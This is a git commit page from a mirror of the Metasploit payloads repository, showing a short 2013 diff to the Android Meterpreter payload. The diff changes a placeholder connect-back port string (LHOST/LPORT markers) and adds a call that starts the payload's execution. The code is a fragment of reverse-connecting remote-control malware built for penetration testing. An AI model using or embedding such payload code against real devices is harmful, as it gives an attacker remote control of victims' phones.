1
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-20 14:39:22 +01:00

fix obvious breakage

This commit is contained in:
timwr 2013-04-18 10:24:50 +01:00 committed by Tim Wright
parent 7b8b36f8b9
commit cbdda49ed7
2 changed files with 4 additions and 1 deletions

View File

@ -15,7 +15,7 @@ public class MainActivity extends Activity
{ {
// avoid re-ordering the strings in classes.dex - append XXXX // avoid re-ordering the strings in classes.dex - append XXXX
private static final String LHOST = "XXXX127.0.0.1 "; private static final String LHOST = "XXXX127.0.0.1 ";
private static final String LPORT = "XXXX4444 "; private static final String LPORT = "YYYY4444 ";
@Override @Override
public void onCreate(Bundle savedInstanceState) public void onCreate(Bundle savedInstanceState)

View File

@ -86,6 +86,9 @@ public class Meterpreter {
errBuffer = null; errBuffer = null;
err = System.err; err = System.err;
} }
if (beginExecution) {
startExecuting();
}
} }
public void startExecuting() throws Exception { public void startExecuting() throws Exception {